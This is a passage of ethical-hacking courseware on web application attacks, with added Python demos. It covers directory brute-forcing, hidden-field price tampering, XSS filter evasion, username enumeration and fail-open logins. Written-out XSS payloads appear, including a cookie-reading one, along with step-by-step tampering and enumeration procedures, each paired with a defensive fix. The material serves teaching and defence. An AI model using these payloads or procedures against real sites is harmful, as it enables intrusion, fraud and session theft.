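from urllib.error import HTTPError
from urllib.request import HTTPRedirectHandler, build_opener

# Constructed target: path -> (status, body). Everything else answers 404.
FAKE_SITE = {
    "/admin": (200, b"<html>admin console</html>"),
    "/backup": (301, b""),                      # redirects to /backup/
    "/.htaccess": (403, b"<html>Forbidden</html>"),
    "/.htpasswd": (403, b"<html>Forbidden</html>"),
}
WORDLIST = ["admin", "backup", "images", ".htaccess", ".htpasswd", "login"]  # stand-in for common.txt


class FakeHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        status, body = FAKE_SITE.get(self.path, (404, b"not found"))
        self.send_response(status)
        if status == 301:
            self.send_header("Location", self.path + "/")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):   # silence per-request logging
        pass


def start_fake_server():
    """Bind to an ephemeral port and serve in a daemon thread; returns (server, base_url)."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), FakeHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_port}"


class _NoRedirect(HTTPRedirectHandler):
    """Report 30x hits instead of following them (Gobuster's default behaviour)."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


_OPENER = build_opener(_NoRedirect)


def probe(base_url, word):
    """GET base_url/word; return (path, status, body_length), or None for 404."""
    path = "/" + word
    try:
        with _OPENER.open(base_url + path, timeout=5) as resp:
            return path, resp.status, len(resp.read())
    except HTTPError as err:
        if err.code == 404:
            return None
        return path, err.code, len(err.read())


def enumerate_dirs(base_url, wordlist, statuses=None, threads=10):
    """Brute-force every word concurrently; keep non-404 hits, optionally only
    those whose status is in `statuses` (the -s filter). Sorted by path."""
    with ThreadPoolExecutor(max_workers=threads) as pool:
        hits = [h for h in pool.map(lambda w: probe(base_url, w), wordlist) if h]
    if statuses is not None:
        hits = [h for h in hits if h[1] in statuses]
    return sorted(hits)


if __name__ == "__main__":
    server, url = start_fake_server()
    for path, status, size in enumerate_dirs(url, WORDLIST):
        print(f"{path} (Status: {status}) [Size: {size}]")   # gobuster -l style line
    server.shutdown()
```

A 403 on .htaccess or .htpasswd, as in the screenshot, is itself information: the file exists and the server is Apache-style, even though its contents are withheld. Real targets that answer every path with 200 need the body-length column (or a baseline request) to separate genuine hits from catch-all pages.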
Nmap

Source: https://nmap.org

Attackers use the Nmap NSE script http-enum to enumerate applications, directories, and files of web servers that are exposed on the Internet. Thus, they can identify critical security vulnerabilities in the target web application.

Run the following Nmap command to gather information about the exposed files and directories of the target web server:

  nmap -sV --script=http-enum <target domain or IP address>
Identify Web Application Vulnerabilities

Attackers use various techniques to detect vulnerabilities in target web applications hosted on web servers to gain administrator-level access to the server or retrieve sensitive information stored on the server. They scan applications to identify vulnerabilities and detect attack surfaces on the target applications. Performing comprehensive vulnerability scanning can disclose security flaws associated with executables, binaries, and technologies used in a web application. Through vulnerability scanning, attackers can also catalog different vulnerabilities, prioritize them based on their threat levels, and use them while targeting an application. Attackers can use tools such as Vega, WPScan Vulnerability Database, Arachni, and Uniscan to identify vulnerabilities in the target web applications.

- Vega
  Source: https://www.subgraph.com
  Vega is a free and open-source web security scanner and web security testing platform for testing the security of web applications. Vega helps you to find and validate SQL injection, cross-site scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java and is GUI-based, and it runs on Linux, OS X, and Windows. Vega also helps you to find vulnerabilities such as reflected cross-site scripting, stored cross-site scripting, blind SQL injection, remote file include, shell injection, and others. It also probes TLS/SSL security settings and identifies opportunities for improving the security of your TLS servers.

  Figure 14.61: Screenshot of Vega
Some additional web application scanning tools are as follows:
- WPScan Vulnerability Database (https://wpvulndb.com)
- Arachni (https://www.arachni-scanner.com)
- AppSpider (https://www.rapid7.com)
- Uniscan (https://sourceforge.net)
Map the Attack Surface

Once the attackers detect the entry points, server-side technologies, and functionalities, they can find their respective vulnerabilities and map the attack surface area of the target web application. Web application analysis thus helps attackers narrow down the attack surface they need to target. Attackers consider the following factors in planning their attack.

Information                     Attack
Client-Side Validation          Injection Attack, Authentication Attack
Database Interaction            SQL Injection, Data Leakage
File Upload and Download        Directory Traversal
Display of User-Supplied Data   Cross-Site Scripting
Dynamic Redirects               Redirection, Header Injection
Login                           Username Enumeration, Password Brute-Force
Session State                   Session Hijacking, Session Fixation
Access Controls                 Privilege Escalation
Cleartext Communication         Data Theft, Session Hijacking
Error Message                   Information Leakage
Email Interaction               Email Injection
Application Code                Buffer Overflows
Third-Party Application         Known Vulnerabilities Exploitation
Web Server Software             Known Vulnerabilities Exploitation

Table 14.2: Table showing information and respective attacks
Slide: Bypass Client-side Controls
Slide: Bypass Client-side Controls: Attack Hidden Form Fields
Slide: Bypass Client-side Controls: Attack Browser Extensions
Slide: Bypass Client-side Controls: Perform Source Code Review
Slide: Bypass Client-side Controls: Evade XSS Filters
Bypass Client-side Controls

A web application requires client-side controls to restrict user inputs when transmitting data via client components and to implement measures that control the user's interaction with his or her own client. A developer uses techniques such as hidden HTML form fields and browser extensions to allow the transmission of data to the server via the client. Often, web developers assume that the data transmitted from the client to the server is not within the user's control, and this assumption can make the application vulnerable to various attacks.

Some of the techniques to bypass the client-side controls are as follows:
- Attack Hidden Form Fields: Identify the hidden tags and fields on the web page and manipulate the data before transmitting it to the server.
- Attack Browser Extensions: Attempt to intercept the traffic from the browser extensions or decompile the browser extensions to capture user data.
- Perform Source Code Review: Perform source code review to identify vulnerabilities in the code that cannot be identified by traditional vulnerability scanning tools.
- Evade XSS Filters: Evade XSS filters by injecting unusual characters into the HTML code.
Attack Hidden Form Fields

E-commerce/retailing web applications use hidden HTML form fields to prevent the user from viewing or modifying data fields such as "products" and "prices of products" and allow the user to enter only certain fields such as "quantity," assuming that the user enters the required quantity before submitting the data to the server. The developer flags these fields as hidden to restrict the user from modifying them. In every client session, developers use hidden fields to store client information, including product prices and discount rates.
Follow the process described below to attack hidden form fields:
- Identify vulnerable web applications
- Save the source code for the HTML page
- Locate the hidden field with the price
- Tamper with the price field's value by editing the source file and reload the page into a browser
- Click the Buy button

The request will be transmitted to the server with the modified price. You can also use proxy tools such as Burp Suite to trap the request that submits the form and modify the price field to any value. In addition, you can attempt to enter negative price values to trick the retail application into refunding the amount through credit card transactions.
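The procedure above, carried through end to end, as an added example that is not part of the courseware: the order form, the catalogue, and both checkout handlers are constructed here. `vulnerable_checkout` does what the text's target does (charges the hidden price), and `hardened_checkout` shows the server-side fix, which is to ignore the client's price entirely and validate the quantity:

```python
"""Hidden form field tampering: the attack, a trusting handler, and a hardened one.

Added example, not from the courseware: the order page, the catalogue and the
two checkout handlers are constructed here to show why a price carried in a
hidden field cannot be trusted, and what the server must do instead.
"""
from html.parser import HTMLParser
from urllib.parse import urlencode, parse_qs

# Constructed page: the developer "hides" the price so the user cannot edit it.
ORDER_PAGE = """
<form action="/buy" method="POST">
  <input type="hidden" name="product" value="SKU-1001">
  <input type="hidden" name="price" value="499.00">
  Quantity: <input type="text" name="quantity" value="1">
  <input type="submit" value="Buy">
</form>
"""

# Server-side source of truth the hardened handler consults (constructed).
CATALOG = {"SKU-1001": 499.00}


class FormFields(HTMLParser):
    """Collect every <input name=... value=...> as the browser would submit it."""
    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("name") and a.get("type") != "submit":
            self.fields[a["name"]] = a.get("value") or ""


def build_post_body(page_html, overrides):
    """Steps 2-4 of the text: read the saved form, tamper with chosen fields, re-encode."""
    parser = FormFields()
    parser.feed(page_html)
    fields = dict(parser.fields)
    fields.update(overrides)          # e.g. the edited price field
    return urlencode(fields)


def vulnerable_checkout(post_body):
    """Trusts the hidden price: charges whatever the client sent (negative included)."""
    f = {k: v[0] for k, v in parse_qs(post_body).items()}
    return round(float(f["price"]) * int(f["quantity"]), 2)


def hardened_checkout(post_body):
    """Ignores the client-supplied price, validates quantity, looks the price up server-side."""
    f = {k: v[0] for k, v in parse_qs(post_body).items()}
    if f.get("product") not in CATALOG:
        raise ValueError("unknown product")
    qty = int(f.get("quantity", "0"))
    if not 1 <= qty <= 100:
        raise ValueError("invalid quantity")
    return round(CATALOG[f["product"]] * qty, 2)


if __name__ == "__main__":
    legit = build_post_body(ORDER_PAGE, {})
    tampered = build_post_body(ORDER_PAGE, {"price": "1.00"})
    refund = build_post_body(ORDER_PAGE, {"price": "-499.00"})
    for label, body in (("legit", legit), ("tampered", tampered), ("negative", refund)):
        print(f"{label:9} vulnerable={vulnerable_checkout(body):>8}  hardened={hardened_checkout(body):>8}")
```

The same POST body is what an intercepting proxy such as Burp Suite lets you edit in flight, so the browser-side step (saving and editing the page) is not needed; either way, the only defence is that the server never reads a price from the request.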
Attack Browser Extensions

The data from a web application that uses browser extension components can be captured by two methods:

- Intercepting Traffic from Browser Extensions
  Attempt to intercept and modify the request and response of the component and the server, respectively. You can use tools such as Burp Suite to capture the data. This method has certain limitations such as data obfuscation or encryption, and secure data serialization.

- Decompiling Browser Extensions
  Using this technique, you can attempt to decompile the component's bytecode to view its detailed source, which allows you to identify the detailed information of the component functionality. The main advantage of this technique is that it allows you to modify data present in the requests that are sent to the server, regardless of any obfuscation or encryption mechanisms employed for the transmitted data.

  You can use proxy tools such as Burp Suite to capture and modify the web page component requests. In the context of bypassing client-side input validation that is implemented in a browser extension, if the component submits the validated data to the server transparently, this data can be modified using an intercepting proxy in the same way as that described for HTML form data.
Perform Source Code Review

Attempt to acquire the source code of the target web application. After acquiring the source code, examine the code to understand the components, frameworks, etc., as well as their working to identify any existing vulnerabilities in the code. This examination can provide information about various functionalities such as removing client-side input validation, submitting nonstandard data to the server, manipulating client-side states or events, or directly invoking functionality that is present within the component.

Perform source code review to identify the following functionalities of a target component:
- Client-side input validation or other security-related logic and events
- Obfuscation or encryption techniques that are applied to the client data before it is transmitted to the server
- Modifiable components with hidden client-side functionalities
- References to server-side functionalities

Evade XSS Filters
XSS filter implementations are applied to web browsers to protect them from imminent XSS attacks; however, attackers can defeat them by injecting unusual characters into the HTML code, through which they can evade the filter implementations. Attackers can embed harmful JavaScript into a web application in many ways. However, the latest browsers are implemented with strong security measures; hence, the script injection sometimes fails. Therefore, attackers often try to not only take advantage of application design flaws but also bypass input evaluation processes conducted by the server or application to trick complicated browser filters.

XSS attacks usually exploit improper configurations and security implementations of a browser, whereas filter bypassing methods are carried out by leveraging flaws in server- or browser-side filters, targeting certain versions or products.

A majority portion of the browser code is written with proper security measures to handle abnormal HTML, JavaScript, and CSS and fix them before delivery to the end users. XSS filter bypassing leverages such an intricate composition of specifications, exceptions, languages, and other browser characteristics to inject scripts through the filters without leaving a trace.

Various XSS filter evasion techniques are discussed below:

Inserting <script> tags into the code is not allowed in a general context. However, some other HTML tags can permit these unusual injections. Event handler attributes are employed to run specific scripts corresponding to the authorized user actions. In general, event handler attributes such as onfocus, onerror, and onclick can be exploited to evade XSS filters.
- Encoding Characters
  Attackers can embed various characters in different ways to evade filters that focus on inspecting text to detect unwanted strings. Approaches for character encoding include the following:

  o A few or all of the characters of HTML elements can be written using ASCII (decimal) character codes to evade filters that search for strings such as javascript:

    <a href="&#106;avascript:alert('XSS Successful')">Click Here!</a>

  o Hexadecimal encoding can be used to bypass filters that search for HTML elements by scanning for & along with numeric characters:

    <a href="&#x6A;avascript:alert(document.cookie)">Click Here!</a>

  o Base64 encoding can be used to cover the tracks of attack code. The string below decodes to the text "Successful XSS":

    <body onload="eval(atob('U3VjY2Vzc2Z1bCBYU1M='))">

    Note that eval() of that text does not itself pop up an alert; for the payload to execute, the Base64-encoded text must be a JavaScript statement such as alert('Successful XSS').

  o Numeric character references may be zero-padded, so filters that match only the unpadded forms can be evaded:

    <a href="&#x6A;avascript&#00058;&#0000097;lert('Successful XSS')">Click Here!</a>

  o XSS payloads can be concealed using character codes:

    <iframe src=# onmouseover="alert(String.fromCharCode(88,83,83))"></iframe>
- Embedding Whitespaces
  Browsers allow convenient usage of whitespace characters while writing JavaScript or HTML code. Thus, attackers can easily evade filters by inserting non-printable characters.

  o Tab characters are dropped while processing the code; they can be inserted to split keywords. Consider this <img> tag, in which <TAB> stands for a literal tab character:

    <img src="java<TAB>script:alert('Successful XSS')">

    You can also encode the tab characters:

    <img src="java&#x09;script:al&#x09;ert('Successful XSS')">

  o Similarly, carriage return and newline characters are not considered during processing; thus, attackers can also insert these characters, encoded, in between:

    <a href="jav&#x0A;a&#x0D;script:&#x0A;ale&#x0D;rt('Successful XSS')">Visit xyz.com</a>
- Manipulating Tags
  XSS filter evasion can also be performed by manipulating tags and skipping attributes.

  o When the filter inspects the script and deletes certain tags (mostly <script>), placing them within other tags can leave legitimate code after they are deleted:

    <scr<script>ipt>document.write("Successful XSS")</scr<script>ipt>

  o Attributes and tags can be separated by supplying a slash, which helps in bypassing whitespace restrictions in value insertion:

    <img/src="popup.jpg" onload=&#x6A;avascript:eval(alert('Successful XSS'))>

  o Attackers also exploit browser interpretations and abnormal tag inputs to bypass filters. The following example shows how to omit the href attribute and still execute script through an event handler:

    <a onmousedown=alert(document.cookie)>Visit xyz.com</a>
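To see why every evasion in this section works, and what a filter has to do about it, here is an added example that is not from the courseware: a single-pass filter that deletes the literal tokens "<script>", "</script>" and "javascript:" (the kind these payloads defeat) beside a check that first normalizes the input the way a browser would (decode numeric and hexadecimal character references, including zero-padded ones, and drop the tab, CR and LF characters the URL parser removes). The payload strings are re-typed from the text above; their exact spelling, and the helper names, are assumptions:

```python
"""Why literal string-matching XSS filters fail against encoded payloads.

Added example, not from the courseware: `naive_sanitize` models the filter this
section defeats (one pass that deletes the literal tokens "<script>",
"</script>" and "javascript:"); `browser_view` approximates what the browser
does before interpreting markup (decode character references, drop tab/CR/LF);
`is_dangerous` runs the check on that normalized view. Payloads are re-typed
from the text; `b64_js` covers the Base64 variant.
"""
import base64
import html
import re

# Payloads from the text (re-typed; exact spelling is an assumption).
PAYLOADS = [
    '<a href="&#106;avascript:alert(\'XSS Successful\')">Click Here!</a>',       # decimal ref
    '<a href="&#x6A;avascript:alert(document.cookie)">Click Here!</a>',         # hex ref
    '<a href="&#x6A;avascript&#00058;&#0000097;lert(\'Successful XSS\')">Click Here!</a>',  # zero padding
    '<img src="java&#x09;script:al&#x09;ert(\'Successful XSS\')">',             # encoded tabs
    '<a href="jav&#x0A;a&#x0D;script:&#x0A;ale&#x0D;rt(\'Successful XSS\')">Visit xyz.com</a>',
    '<scr<script>ipt>document.write("Successful XSS")</scr<script>ipt>',        # nested tags
]

DANGEROUS = ("javascript:", "<script")


def naive_sanitize(s: str) -> str:
    """Single-pass literal deletion: the filter that nested tags and encoding defeat."""
    for token in ("<script>", "</script>", "javascript:"):
        s = s.replace(token, "")
    return s


def browser_view(s: str) -> str:
    """Approximate the browser's view: decode character references (zero-padded
    ones included), then drop tab/CR/LF, which URL parsing strips anyway."""
    decoded = html.unescape(s)
    return re.sub(r"[\t\r\n]", "", decoded).lower()


def is_dangerous(s: str) -> bool:
    """Would the browser see a script URL or a script tag in this markup?
    Checking the normalized view is what makes the tricks above visible; a
    production filter should allow-list markup rather than block-list tokens."""
    view = browser_view(s)
    return any(token in view for token in DANGEROUS)


def b64_js(js: str) -> str:
    """Base64 of a JavaScript string, i.e. what atob() in the payload would decode."""
    return base64.b64encode(js.encode()).decode()


def base64_payload(js: str) -> str:
    """The <body onload="eval(atob(...))"> wrapper from the text around `js`."""
    return '<body onload="eval(atob(\'%s\'))">' % b64_js(js)


if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"live after naive filter: {is_dangerous(naive_sanitize(p))!s:5} "
              f"caught by normalized check: {is_dangerous(p)!s:5}  {p}")
    print(base64_payload("Successful XSS"), "  <- decodes to plain text; eval() runs nothing useful")
    print(base64_payload("alert('Successful XSS')"), "  <- decodes to a statement")
```

The nested-tag payload is the instructive one: `naive_sanitize` strips both `<script>` occurrences in a single pass and hands back `<script>document.write("Successful XSS")`, a perfectly valid tag. Decoding before matching handles the encoding cases, but nothing short of parsing the markup handles the structural ones, which is why sanitizers work on a parsed tree and an allow-list.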
Slide: Attack Authentication Mechanism (exploit design and implementation flaws in web applications, such as failure to check password strength or insecure transmission of credentials, to bypass authentication mechanisms)
Slide: Design and Implementation Flaws in Authentication Mechanism
Slide: Username Enumeration
Slide: Password Attacks: Password Functionality Exploits
Slide: Password Attacks: Password Guessing and Brute-forcing
Slide: Session Attacks: Session ID Prediction/Brute-forcing
Slide: Cookie Exploitation: Cookie Poisoning
Slide: Bypass Authentication: Bypass SAML-based SSO
Attack Authentication Mechanism

In general, web applications authenticate users through authentication mechanisms such as login functionality. During web application analysis, attackers try to find authentication vulnerabilities such as weak passwords (e.g., short or blank, common dictionary words or names, user's names, defaults). Attackers exploit these vulnerabilities to gain access to the web application by network eavesdropping, brute-force attacks, dictionary attacks, cookie replay attacks, credential theft, etc.

Many authentication mechanisms used by web applications have design flaws. Attackers can identify these flaws and exploit them to gain unauthorized access to the web application. Such design flaws include failure to check password strength, insecure transmission of credentials over the Internet, etc. Web applications usually authenticate their clients or users by a combination of a username and password, which can be identified and exploited.

- Username Enumeration
  Attackers can enumerate usernames in two ways: verbose failure messages and predictable usernames.

  o Verbose Failure Message
    In a typical login system, the user enters two fields, namely username and password. In some cases, an application will ask for additional information. If the user is trying to log in and fails, it implies that at least one field was incorrect. When the application reveals which one, this provides grounds for an attacker to exploit the application. Examples:
    * Account <username> not found
    * Incorrect password provided
    * Account <username> has been locked out

  o Predictable Usernames
    Some applications automatically generate account usernames according to some predictable sequence. This makes it very easy for the attacker to discern the sequence and potentially compile an exhaustive list of valid usernames.
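The three verbose messages listed above are all an attacker needs, and the fix is a single generic message. The following is an added example, not from the courseware: two constructed login handlers (one verbose, one generic) and the enumeration logic that submits a known-bad control name plus a wrong password and groups candidates by the response they get back. The user store, candidate list and hash scheme are all assumptions made here:

```python
"""Username enumeration from verbose login failures, and the fix.

Added example, not from the courseware: `USERS`, both handlers and the
candidate list are constructed. `verbose_login` returns the three messages
the text lists; `generic_login` returns one message whichever check failed.
`valid_usernames` is the attacker's side: a control name that certainly does
not exist marks the "unknown user" response, and everything that answers
differently is a real account.
"""
import hashlib
import hmac


def _h(salt: str, password: str) -> str:
    return hashlib.sha256((salt + password).encode()).hexdigest()


# Constructed user store: username -> (salt, digest, locked_out)
USERS = {
    "alice": ("s1", _h("s1", "Winter2020!"), False),
    "bob":   ("s2", _h("s2", "hunter2"), False),
    "carol": ("s3", _h("s3", "Pa55w0rd"), True),     # locked out
}


def verbose_login(username, password):
    """Design flaw: the message says *which* check failed."""
    if username not in USERS:
        return False, f"Account {username} not found"
    salt, digest, locked = USERS[username]
    if locked:
        return False, f"Account {username} has been locked out"
    if not hmac.compare_digest(_h(salt, password), digest):
        return False, "Incorrect password provided"
    return True, "Login successful"


def generic_login(username, password):
    """Same checks, one failure message; lockout is enforced but not reported."""
    record = USERS.get(username)
    # Hash even for unknown users so response time does not reveal existence.
    salt, digest, locked = record if record else ("dummy", _h("dummy", "-"), False)
    ok = hmac.compare_digest(_h(salt, password), digest) and record is not None and not locked
    return (True, "Login successful") if ok else (False, "Invalid username or password")


def enumerate_usernames(login, candidates, probe_password="not-the-password"):
    """Group candidates by the failure template they produce (the echoed name is
    replaced so identical templates compare equal). One bucket means no leak."""
    buckets = {}
    for name in candidates:
        _, msg = login(name, probe_password)
        buckets.setdefault(msg.replace(name, "<username>"), []).append(name)
    return buckets


def valid_usernames(login, candidates, control="zz-no-such-user-zz"):
    """Names that do not share the control name's 'unknown user' response."""
    buckets = enumerate_usernames(login, [control] + list(candidates))
    unknown_template = next(t for t, names in buckets.items() if control in names)
    return sorted(n for t, names in buckets.items() if t != unknown_template for n in names)


CANDIDATES = ["admin", "alice", "bob", "carol", "dave"]   # constructed wordlist

if __name__ == "__main__":
    print("verbose handler leaks:", valid_usernames(verbose_login, CANDIDATES))
    print("generic handler leaks:", valid_usernames(generic_login, CANDIDATES))
```

Note that the locked-out message is as useful to the attacker as "not found": it confirms the account exists. Equalizing the message is necessary but not sufficient; response timing, status codes, redirects and the password-reset and registration forms must be made indistinguishable too.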

- Password Attacks
  A password attack is a process of trying various password cracking techniques to discover a user account password by which the attacker can gain access to an application. Methods for cracking passwords include the following:
  o Password functionality exploits
  o Password guessing
  o Brute-force attack
  o Dictionary attack
  o Attack on the password reset mechanism
- Session Attacks
  The following types of session attacks are employed by attackers against authentication mechanisms:
  o Session prediction: It focuses on predicting session ID values that allow an attacker to bypass the authentication mechanism of an application. By analyzing and understanding the session ID generation process, the attacker can predict a valid session ID value and gain access to the application.
  o Session brute-forcing: An attacker brute-forces the session ID of a target user and uses it to log in as a legitimate user and gain access to the application.
  o Session poisoning: It allows an attacker to inject malicious content, modify the user's online experience, and obtain unauthorized information.
- Cookie Exploitation
  Cookie exploitation attacks are of the following types:
  o Cookie poisoning: It is a type of parameter tampering attack in which the attacker modifies the cookie contents to draw unauthorized information about a user and thus perform identity theft.
  o Cookie sniffing: It is a technique in which an attacker sniffs a cookie containing the session ID of the victim who has logged in to a target website and uses the cookie to bypass the authentication process and log in to the victim's account.
  o Cookie replay: It is a technique used to impersonate a legitimate user by replaying the session cookie that contains the session ID of that user (as long as he/she remains logged in). This attack stops working once the user logs out of the session.
- Bypass Authentication
  o Bypass SAML-based SSO: Attackers take advantage of signature misconfigurations, session expiry timeouts, session replays, misdirected SAML messages, etc., to bypass SAML-based SSO authentication.
Design Flaws in Authentication Mechanism

Authentication mechanisms are more vulnerable to attacks than other implementations involved in web application security. Applications usually validate a user via his/her login credentials; even a minor weakness in this authentication process can lead to serious consequences such as granting access to illegitimate users.

- Bad Passwords: Many applications exercise minimal control over checking and validating user credentials. Users often come across applications that accept passwords such as blank or short values, ordinary names, dictionary words, the same password as the username, and default parameters. Such passwords can be easily guessed by attackers, allowing them to access the application resources.
- Brute-Forcible Login: The login feature of an application allows an attacker to predict user credentials, through which the attacker can enter the application illegitimately. If the application permits numerous login attempts without any restrictions, such as blocking an account after a certain number of attempts, attackers can continue to try different passwords until they find the right one. Thus, even an unskilled attacker can log in by manually entering different password combinations.

- Verbose Failure Messages: Any login form of an application requests users to fill in at least two fields, namely username and password. A few applications may also ask for additional parameters such as DOB, answer to a security question, and OTP, to validate a user. If the login attempt is unsuccessful, the application indicates that the information provided is not valid. When the application specifies which field is incorrect or pops up reasons for denying access, attackers can easily exploit that field by trying a large set of similar names or words to enumerate the valid data required to access the application. The list of enumerated data can also be used later for social engineering.
- Insecure Transmission of Credentials: If an application makes an insecure HTTP connection to pass sensitive information, it becomes susceptible to MITM attacks, through which attackers can eavesdrop on and tamper with data transmission. Even when an HTTPS connection is made, attackers can still steal the credentials if the application handles credentials in an insecure manner, such as passing information as query string parameters and storing credentials in cookies.

- Password Reset Mechanism: Many applications require users to change their passwords periodically to reduce the threat of compromised passwords. Moreover, when users notice misuse of their credentials, they can change their passwords immediately to prevent illegitimate use. Sometimes, this password reset feature can also be exploited. Vulnerabilities that are ignored in the main login function can appear again in the password reset mechanism. Some of the flaws in the password reset mechanism are as follows:

  o Generating verbose errors that specify whether the username is valid
  o Enabling guessing of the "Existing password" field without any restrictions
  o Checking whether the "New Password" and "Confirm Password" fields contain the same value only after authenticating the existing password, so that the difference in responses lets an attacker confirm the existing password explicitly
- Forgotten Password Mechanism: As with the password change mechanism, methods for recovering forgotten passwords often entail issues that are commonly ignored in the main login function, such as enumerating usernames. Additionally, several design flaws in the forgotten password mechanism often make it more vulnerable, through which the overall authentication logic of an application is targeted. Some of the flaws in the forgotten password mechanism are as follows:
  o Providing a secondary challenge when a user forgets a password
  o Developers often ignore the chances of the application being brute-forced during the password recovery process. If the application allows any number of attempts to recover the password, it is highly likely that the password will be recovered by guessing random answers related to the user.
- "Remember Me" Functionality: Applications also provide the "Remember Me" function for convenience, to avoid re-entry of the username and password when a user signs in to an application from his/her device repeatedly. This mechanism is often vulnerable because the user can be attacked both from the local computer and by users on other machines. "Remember Me" functions are enforced with some persistent cookies. When these cookies are presented, the application trusts them, as they were already stored in the earlier session, and generates a new session without asking for the login credentials again. Attackers can try a list of ordinary words or enumerated usernames to gain complete access to the application without being validated.
- User Impersonation: Some privileged users access applications using other users' credentials to assist the original users in performing their operations. For instance, if the Internet connection is broken, the user contacts the service provider to seek advice. Then, the customer care executive logs in with the user's data on his or her system and assists the user in resolving the service outage. If an application allows privileged users to impersonate others, any flaws in the impersonation logic can lead to vertical privilege escalation, through which an attacker can gain complete access to the application.
are designed
- Improper Validation of Credentials: Applications are designed with proper authentication mechanisms such as accepting passwords with a minimum length and allowing case-sensitive (upper and lower case), numeric, and special characters. By contrast, a poorly designed application's authentication mechanisms not only ignore good security implementations but also fail to consider the user's attempts to apply strong password characters. For instance, some applications truncate the password and evaluate only the first few characters. A few applications check passwords case-insensitively, and others perform unusual character stripping before password checks. Attackers can perform automated password guessing attacks on such applications to remove the unwanted test cases and shorten the number of requests required to compromise an account.

- Predictable Usernames and Passwords: A few applications produce usernames automatically based on a predictable sequence. Attackers exploit this characteristic of an application and instantly acquire the valid list of usernames, through which they can perform further attacks. Sometimes, the user list is created all at once or in the form of groups, and all these users' initial passwords are distributed via some sources. The sources for creating passwords can allow the attacker to guess the passwords of the users. Such vulnerabilities are often triggered within an intranet environment.
- Insecure Distribution of Credentials: Most applications adopt a procedure in which the login credentials are supplied via SMS, email, post, etc. In some cases, what is supplied to users may include not only login credentials but also a URL containing an "activation code" for enrolling or initially changing the system-generated passwords. If a bunch of such URLs are sent to multiple users, attackers can discover this activity by generating user accounts and deduce the activation codes sent via URLs to the newly enrolled and yet-to-be-enrolled users.
Implementation Flaws in Authentication Mechanism

Sometimes, carefully designed application security mechanisms open gateways to attacks due to some mistakes in their enforcement. These mistakes may lead to information leakage, bypassing of login, or diminishing the security of the entire security module. Implementation flaws in authentication are more dangerous as they cannot be discovered with normal testing methods. Some of the implementation flaws in authentication mechanisms are as follows:

Fail-Open Login Mechanism: It is a logic defect that can trigger some exceptions, such as a null pointer exception, in the authentication process. For instance, invoking db.getUser() leads to significant consequences as the requested function has no username or password credentials but it can still log in. This session may be dependent on a specific user identity; hence, even when it is not fully functional, it can still allow attackers to access critical information or functionality.

Example:

    public Response verifyLogin(Session mySession)
    {
        try
        {
            String username = mySession.getParameter("username");
            String password = mySession.getParameter("password");
            User thisUser = db.getUser(username, password);
            if (thisUser == null)
            {
                // invalid credentials
                mySession.setMessage("Login Failed.");
                return doLogin(mySession);
            }
        }
        catch (Exception e) {}   // exception swallowed: the null check above is never reached
        // valid user (also reached when getUser threw an exception: the fail-open path)
        mySession.setMessage("Login successful!");
        return doMainMenu(mySession);
    }

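The same fail-open defect reproduced in Python beside a fail-closed handler, as an added example (not code from the CEH courseware). The Session class, the UserDB stand-in and its single account are constructed here so the block runs offline; only the control flow mirrors the Java snippet above.

```python
# Added example, not from the CEH courseware: the fail-open logic defect of the
# Java snippet above, reproduced in Python beside a fail-closed version. The
# Session class, the UserDB stand-in and its single account are constructed
# here so the block runs offline.
from dataclasses import dataclass


@dataclass
class Session:
    params: dict
    message: str = ""
    screen: str = ""   # page the handler sends the user to: "login" or "main_menu"


class UserDB:
    """Constructed stand-in for db.getUser(): 'alice' is the only account."""
    USERS = {"alice": "correct horse battery staple"}

    def get_user(self, username, password):
        if username is None or password is None:
            # A missing parameter raises inside the lookup, the kind of
            # unexpected exception the text describes.
            raise TypeError("missing credential parameter")
        if self.USERS.get(username) == password:
            return username
        return None


def verify_login_fail_open(session, db=UserDB()):
    """Mirrors the courseware's Java example: the catch block swallows the
    exception, so control skips the null check and reaches the success path."""
    try:
        user = db.get_user(session.params.get("username"),
                           session.params.get("password"))
        if user is None:
            session.message = "Login Failed."
            session.screen = "login"
            return session
    except Exception:
        pass   # exception swallowed; nothing stops the fall-through below
    session.message = "Login successful!"
    session.screen = "main_menu"
    return session


def verify_login_fail_closed(session, db=UserDB()):
    """Fail-closed variant: only an explicit positive lookup grants access, and
    any exception during the lookup is treated as a failed login."""
    try:
        user = db.get_user(session.params.get("username"),
                           session.params.get("password"))
    except Exception:
        user = None   # an error is never a successful login
    if user is None:
        session.message = "Login Failed."
        session.screen = "login"
        return session
    session.message = "Login successful!"
    session.screen = "main_menu"
    return session


def demo():
    """Screens reached by each handler when the password parameter is absent."""
    fail_open = verify_login_fail_open(Session({"username": "alice"}))
    fail_closed = verify_login_fail_closed(Session({"username": "alice"}))
    return fail_open.screen, fail_closed.screen


if __name__ == "__main__":
    print(demo())   # ('main_menu', 'login')
```

The fix is structural rather than a matter of catching more exceptions: the success path must be reachable only through a positive result, so that any error, including ones the developer never anticipated, lands on the failure branch.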
Flaws in Multistage Login Functionality: Multistage login functionality is an advanced security mechanism for username-and-password-based login models. This login method is performed in three stages: username and password entry, a challenge for certain input digits or memorable characters, and submission of values disclosed on a changing physical token. The first stage involves users validating themselves with their username and other valid input, and the remaining stages carry out different validation checks. Such validations often come with different logic defects known as vulnerabilities.

Insecure Storage of Credentials: Although an application may have no inherent flaws, it can make itself vulnerable by storing login credentials in an insecure way. In general, applications store user credentials in a database in an unencrypted form. Some applications use weak encryption algorithms to encrypt and store credentials. Vulnerabilities in such implementations allow attackers to perform brute-force and password cracking attacks.

Username Enumeration

Source: https://wordpress.com

If a login error states which of the username or password is incorrect, that field can be guessed using the trial-and-error method. Consider the following example. An attacker tries to enumerate the username and password of "Rini Matthews" on wordpress.com. In the first attempt, the attacker tries to log in as "rini.matthews," which results in the login failure message "invalid email or username."

Figure 14.62: Error message for username rini.matthews does not exist

In the second attempt, the attacker tries to log in as "rinimatthews," which results in a message stating that the password entered for the username is incorrect, thus confirming that the username "rinimatthews" exists.

Figure 14.63: Error message for username rinimatthews successfully enumerated

